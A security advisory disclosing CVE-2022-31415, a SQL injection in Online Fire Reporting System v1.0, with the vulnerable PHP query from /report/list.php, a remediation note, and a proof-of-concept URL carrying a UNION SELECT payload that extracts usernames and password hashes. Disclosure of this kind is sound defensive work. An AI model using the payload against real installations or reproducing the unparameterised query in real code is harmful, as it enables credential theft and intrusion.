Headline
CVE-2022-31415: SQL Injection - Online Fire Reporting System - ResearchInTheBin
Online Fire Reporting System v1.0 was discovered to contain a SQL injection vulnerability via the GET parameter in /report/list.php.
May 21, 2022
Product
Online Fire Reporting System
Product Link
Link
Vulnerability
SQL Injection
Severity
Critical
Overview
SQL Injection is an attack where an attacker can maliciously inject their own code into a SQL query. This can lead to the attacker being able to dump arbitary data from the database.
The vulnerability is a result of using non-parameterised queries when fetching search results on the report search page inside the /report/list.php file.
<?php
if(isset($_GET['search'])):
$i = 1;
$qry = $conn->query("SELECT * from `request_list` where (fullname LIKE '%{$_GET['search']}%' or contact LIKE '%{$_GET['search']}%' or code LIKE '%{$_GET['search']}%') order by abs(unix_timestamp(date_created)) desc ");
while($row = $qry->fetch_assoc()):
?>
As the GET parameters provided by the user are not sanitised or parameterised, a user can inject their own query and end their query in a semicolon and a SQL comment, removing the end of the query and being able to control what data is returned.
This can be used to exfiltrate the username and passwords of all users on the platform. As the passwords are stored as unsalted MD5 hashes, these passwords would be very easy to crack through brute force.
POC Url:
http://localhost/?p=report/list&search=a%27)%20UNION%20SELECT%20null,%20null,username,password,%20null,%20null,%20null,%20null,%20null,%20null%20FROM%20users;%20--%20-
The application should use parameterised queries to ensure that any user input is properly escaped.